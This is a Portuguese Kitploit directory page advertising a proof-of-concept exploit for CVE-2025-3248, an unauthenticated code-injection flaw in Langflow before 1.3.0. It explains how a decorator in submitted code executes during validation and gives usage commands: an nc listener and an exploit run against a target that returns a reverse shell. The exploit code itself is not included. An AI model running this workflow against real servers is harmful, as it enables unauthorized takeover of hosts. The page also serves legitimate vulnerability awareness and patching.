Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Prova de conceito de exploit para CVE-2025-3248, uma vulnerabilidade de execução remota de código não autenticada no Langflow, demonstrando injeção de código por meio do endpoint /api/v1/validate/code.

Ver Repositório
há 16h 30mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3248 — Execução Remota de Código Não Autenticada no Langflow

Prova de conceito de exploração para CVE-2025-3248, uma vulnerabilidade de execução remota de código não autenticada no Langflow, uma plataforma de construção de fluxos de trabalho para IA/LLM.

  • Versões afetadas: Langflow < 1.3.0
  • Corrigido em: 1.3.0
  • Classe de vulnerabilidade: RCE não autenticado (CWE-94, Injeção de Código)
  • Status: Adicionado ao catálogo de Vulnerabilidades Exploradas Conhecidas da CISA após ser observado sendo explorado ativamente na natureza por botnets.

Causa raiz

O Langflow expõe um endpoint, POST /api/v1/validate/code, destinado a "validar" um trecho de código Python enviado pela interface (por exemplo, código de componentes personalizados). Internamente, ele analisa e compila o código com ast.parse() / compile() e informa se é válido — sem exigir autenticação.

O bug: o Python avalia expressões de decoradores em tempo de análise/compilação, antes que a função decorada seja sequer chamada. Se o "código a validar" enviado contiver um decorador como:

root@kitploit:~
@exec("...código malicioso...")
def test():
    pass

a chamada exec(...) é executada no momento em que o código é analisado — a validação nunca precisa realmente invocar test(). Combinado com a ausência de autenticação e de sandboxing, uma única requisição HTTP não autenticada é suficiente para executar comandos arbitrários no host que executa o Langflow.

Uso

  1. Inicie um listener na sua máquina:
    root@kitploit:~
    nc -lvnp 9001
    
  2. Execute o PoC contra um alvo:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Se o alvo for vulnerável, você obterá um shell no listener.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Requisitos

root@kitploit:~
pip install requests

Aviso legal

Este código é fornecido apenas para fins educacionais e testes de segurança autorizados (laboratórios, CTFs, engajamentos com permissão escrita explícita). Não execute isso contra sistemas que você não possui ou para os quais não possui autorização explícita para testar. O autor não é responsável pelo uso indevido.

Referências

  • Aviso de Segurança do Langflow GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Baixar ferramenta